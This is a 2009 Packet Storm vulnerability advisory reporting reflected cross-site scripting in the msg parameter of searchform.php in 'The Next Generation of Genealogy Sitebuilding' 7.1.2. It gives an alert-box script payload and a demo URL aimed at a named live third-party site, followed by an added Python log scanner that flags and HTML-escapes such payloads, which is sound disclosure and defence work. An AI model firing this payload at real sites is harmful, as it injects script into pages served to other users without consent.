The Next Generation Of Genealogy Sitebuilding XSS

2009-12-13T00:00:00
ID PACKETSTORM:83745
Type packetstorm
Reporter bi0
Modified 2009-12-13T00:00:00

Description

                                        
                                            `  
  
  
______ __ ______   
/\ == \ /\ \ /\ __ \   
\ \ __< \ \ \ \ \ \/\ \   
\ \_____\ \ \_\ \ \_____\   
\/_____/ \/_/ \/_____/   
  
  
[#]----------------------------------------------------------------[#]  
#   
# [x] Target: The Next Generation of Genealogy Sitebuilding [XSS]  
# [x] Author: bi0  
# [x] Contact: bukibv@hotmail.com   
# [x] Download: http://lythgoes.net/genealogy/software.php  
# [x] Version: 7.1.2  
# [x] Price: $29.99 USD  
# [x] Thanks: packetdeath  
#   
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :   
#   
# http://localhost/searchform.php?msg=[XSS]  
#  
# [x] Poc :   
#   
# http://localhost/searchform.php?msg=searchform.php?msg="/><script>alert('XSS')</script>  
#   
[#]------------------------------------------------------------------------------------------[#]  
#  
# Demo :   
#   
# [+] http://horwitzfam.org/searchform.php?msg="/><script>alert('XSS')</script>  
#   
#   
[#]-------------------------------------------------------------------------------------------[#]  
  
#EOF  
  
`
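A defender-side check for the `msg` parameter of `searchform.php` named in the advisory above, as an added example that is not part of the original advisory or of the product's code: it flags access-log requests whose decoded `msg` value carries HTML metacharacters and shows the value as it looks once output-encoded. Assumptions: a combined-format access log, constructed sample lines, hypothetical function names, and Python's `html.escape` standing in for the encoding the application would apply on output (in PHP, `htmlspecialchars` with `ENT_QUOTES`).

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the advisory); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Dec/2009:10:01:02 +0000] "GET /searchform.php?msg=No+results+found HTTP/1.1" 200 5120',
    '198.51.100.9 - - [13/Dec/2009:10:02:10 +0000] "GET /searchform.php?msg=%22/%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 5210',
    '203.0.113.4 - - [13/Dec/2009:10:03:00 +0000] "GET /index.php?msg=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value leave a quoted attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"\']')


def msg_values(log_line):
    """Return the URL-decoded msg values of a searchform.php request, else []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/searchform.php"):
        return []
    return parse_qs(url.query, keep_blank_values=True).get("msg", [])


def suspicious_requests(lines):
    """Return (line_number, decoded_msg) for requests whose msg contains markup."""
    hits = []
    for number, line in enumerate(lines, 1):
        for value in msg_values(line):
            if MARKUP_RE.search(value):
                hits.append((number, value))
    return hits


def render_msg(value):
    """Encode msg for HTML text or a quoted attribute so it is displayed, not parsed."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: msg={value!r} -> rendered as {render_msg(value)!r}")
```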